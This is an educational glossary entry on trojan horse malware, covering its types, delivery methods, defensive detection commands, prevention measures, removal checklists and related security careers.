Trojan Horse

Why It Matters

The Trojan horse—named after the legendary Greek deception—represents one of the most effective and enduring attack vectors in cybersecurity. Unlike viruses or worms that spread automatically, trojans rely on human psychology. They exploit trust, curiosity, and the desire for free software to trick users into installing malicious code willingly.

Trojans account for a significant portion of all malware infections worldwide. From banking trojans that steal financial credentials to Remote Access Trojans (RATs) that give attackers complete control of systems, these threats target both individuals and organizations. Every day, thousands of users unknowingly install trojans disguised as legitimate software, games, or utilities.

For cybersecurity professionals, understanding trojans is essential. SOC analysts must recognize trojan indicators during incident investigations. Penetration testers use trojan techniques (ethically) to test organizational defenses. Security engineers design systems that prevent trojan execution. This knowledge directly protects organizations from one of the most prevalent threat categories.

The social engineering aspect of trojans makes user awareness equally important as technical defenses. No firewall can stop a user from deliberately installing malicious software they believe is legitimate.

How Trojan Horses Work

Trojans follow a deception-based attack model that exploits user trust:

1. Disguise: The trojan is packaged to appear as legitimate software—a game, utility, cracked program, or document
2. Delivery: Reaches victims via phishing emails, malicious websites, fake download sites, or compromised software
3. Installation: User executes the file, believing it to be safe, granting the trojan access
4. Payload Execution: Once installed, the trojan executes its malicious purpose
5. Persistence: Establishes mechanisms to survive system reboots
6. Concealment: Hides its presence from users and security software

Types of Trojan Horses

Remote Access Trojans (RATs)

RATs give attackers complete remote control over infected systems, essentially turning the victim's computer into a zombie they can control.

Remote Access Trojan Capabilities:

System Control:
- Execute commands remotely
- Browse file system
- Modify/delete files
- Install additional malware

Surveillance:
- Capture screenshots
- Record keystrokes (see [phishing](/glossary/phishing))
- Activate webcam/microphone
- Monitor user activity

Data Theft:
- Steal passwords and credentials
- Exfiltrate documents
- Capture clipboard contents
- Harvest browser data

Notable RATs: njRAT, DarkComet, Remcos, Quasar

Banking Trojans

Specifically designed to steal financial credentials and intercept banking transactions.

Techniques:

• Form grabbing: Captures data entered in browser forms
• Web injection: Modifies banking websites in real-time to capture extra credentials
• Session hijacking: Takes over active banking sessions
• Two-factor authentication bypass: Intercepts SMS codes or authentication tokens

Notable examples: Zeus, Emotet, TrickBot, Dridex

Downloader Trojans

Initial infection vector that downloads and installs additional malware once inside the network.

Backdoor Trojans

Create hidden access points that bypass normal authentication, allowing attackers to return at will.

Characteristics:

• Listens on specific ports for attacker connections
• May use encrypted communications to avoid detection
• Often survives removal of other malware components
• Can persist through system updates

Rootkit Trojans

Combine trojan delivery with rootkit capabilities to hide deep within the operating system.

Hiding techniques:

• Kernel-level hooking
• Driver manipulation
• Bootkit functionality (survives OS reinstalls)
• Process and file hiding from security tools

Fake Antivirus Trojans (Scareware)

Pretend to be security software, displaying fake virus warnings to trick users into paying for "removal" or installing more malware.

Fake Antivirus Warning Signs:

- Unexpected security alerts from unknown software
- Claims of hundreds of "infections" found
- Demands immediate payment to "clean" system
- Browser hijacking to fake security sites
- Cannot be closed or uninstalled normally
- Legitimate antivirus is blocked or disabled

Information Stealers

Focus on harvesting specific types of valuable data for sale or exploitation.

Target data:

• Browser-stored passwords
• Cryptocurrency wallet credentials
• Gaming platform accounts
• Email and social media credentials
• Corporate VPN credentials

Common Delivery Methods

Social Engineering Vectors

Trojan Delivery Methods:

Email-Based:
- Malicious attachments (documents, executables)
- Links to drive-by download sites
- Fake invoice or shipping notifications

Web-Based:
- Compromised legitimate websites
- Fake download portals
- Malvertising (malicious ads)
- Watering hole attacks

Software-Based:
- Pirated/cracked software
- Fake software updates
- Bundled with free utilities
- Compromised app stores

Physical:
- Infected USB drives
- Malicious QR codes
- Compromised hardware

Exploit Kits

Automated tools that scan visitors for vulnerabilities and deliver trojans via browser exploits.

Detection Methods

Behavioral Indicators

Signs that may indicate trojan infection:

• Performance issues: Unexplained slowdowns, high CPU/memory usage
• Network anomalies: Unexpected outbound connections, bandwidth usage
• Security software problems: Antivirus disabled or blocked
• Strange system behavior: Programs opening/closing, cursor moving
• Unauthorized access: Unknown login attempts or account lockouts

Technical Detection

# Check for suspicious network connections
netstat -an | grep ESTABLISHED
lsof -i -P | grep LISTEN

# Review running processes
ps aux --sort=-%cpu | head -20

# Check startup programs (macOS)
launchctl list

# Look for recently modified executables
find /usr/local/bin -mtime -7 -type f 2>/dev/null

# Review scheduled tasks
crontab -l
ls -la /etc/cron.*

# Hash suspicious files for VirusTotal lookup
sha256sum suspicious_file

Security Tool Detection

• Endpoint Detection and Response (EDR): Behavioral analysis catches trojans evading signatures
• SIEM: Correlates trojan indicators across network
• Network monitoring: Identifies command and control communications
• Sandboxing: Analyzes suspicious files safely before execution

Prevention Strategies

Technical Controls

• Email filtering: Block suspicious attachments at the gateway
• Web filtering: Prevent access to known malicious sites
• Application whitelisting: Only allow approved software to execute
• Firewall rules: Block unauthorized outbound connections
• Regular updates: Patch vulnerabilities trojans exploit

User Awareness

• Verify software sources: Only download from official vendors
• Recognize phishing: Don't click suspicious links or attachments
• Avoid pirated software: Free often means compromised
• Check file extensions: Be wary of executables disguised as documents
• Use two-factor authentication: Limits damage if credentials are stolen

Organizational Measures

• Security training: Regular education on trojan threats
• Least privilege: Limit what users can install
• Network segmentation: Contain potential infections
• Incident response plans: Prepare for trojan discovery
• Backup strategies: Maintain offline backups for recovery

Removal and Recovery

Immediate Steps

1. Isolate the system: Disconnect from network to prevent data exfiltration
2. Boot into safe mode: Limit what runs during investigation
3. Preserve evidence: Document before making changes
4. Run multiple scanners: Different tools catch different threats
5. Check persistence mechanisms: Startup items, scheduled tasks, services

Complete Remediation

Trojan Removal Checklist:

Containment:
[ ] Disconnect from network
[ ] Document running processes
[ ] Capture network connections
[ ] Back up critical data (verify clean)

Analysis:
[ ] Run full antivirus scan
[ ] Use anti-malware tools (Malwarebytes, etc.)
[ ] Check browser extensions
[ ] Review startup programs
[ ] Examine scheduled tasks
[ ] Check user accounts for additions

Post-Removal:
[ ] Change ALL passwords (from clean device)
[ ] Enable two-factor authentication
[ ] Monitor financial accounts
[ ] Update all software
[ ] Review what data may have been compromised
[ ] Consider full system reinstall for severe infections

Career Connection

Understanding trojans is fundamental for multiple cybersecurity roles. Malware analysts reverse-engineer trojans to understand their capabilities. SOC analysts detect and respond to trojan infections daily. Threat intelligence analysts track trojan campaigns and attribute them to threat actors. Penetration testers use similar techniques (ethically) to test defenses.